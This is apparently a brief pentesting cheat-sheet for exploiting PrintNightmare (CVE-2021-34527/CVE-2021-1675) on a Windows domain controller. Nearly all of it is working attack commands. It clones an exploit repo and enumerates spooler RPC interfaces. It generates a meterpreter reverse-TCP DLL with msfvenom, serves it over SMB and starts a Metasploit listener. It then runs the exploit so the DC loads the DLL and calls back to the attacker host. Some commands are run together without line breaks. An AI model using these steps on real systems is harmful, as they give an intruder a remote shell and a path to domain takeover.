PrintNightmare
CVE-2021-34527 / CVE-2021-1675
git clone https://github.com/cube0x0/CVE-2021-1675.gitrpcdump.py @<IP-address-DC> | egrep 'MS-PAR|MS-RPRN'msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=<attacker-IP-address> LPORT=<listen-local-port> -f dll > script.dllsmbserver.py -smb2support share script.dllmsfconsole
use exploit/multi/handler
set PAYLOAD windows/x64/meterpreter/reverse_tcp
set LHOST <attacker-IP-address>
set LPORT <listen-local-port>
run -jCVE-2021-1675.py <ACME.LOCAL>/<user>:<password>@<IP-address-DC> '\\<attacker-IP-address>\share\script.dll'Última actualización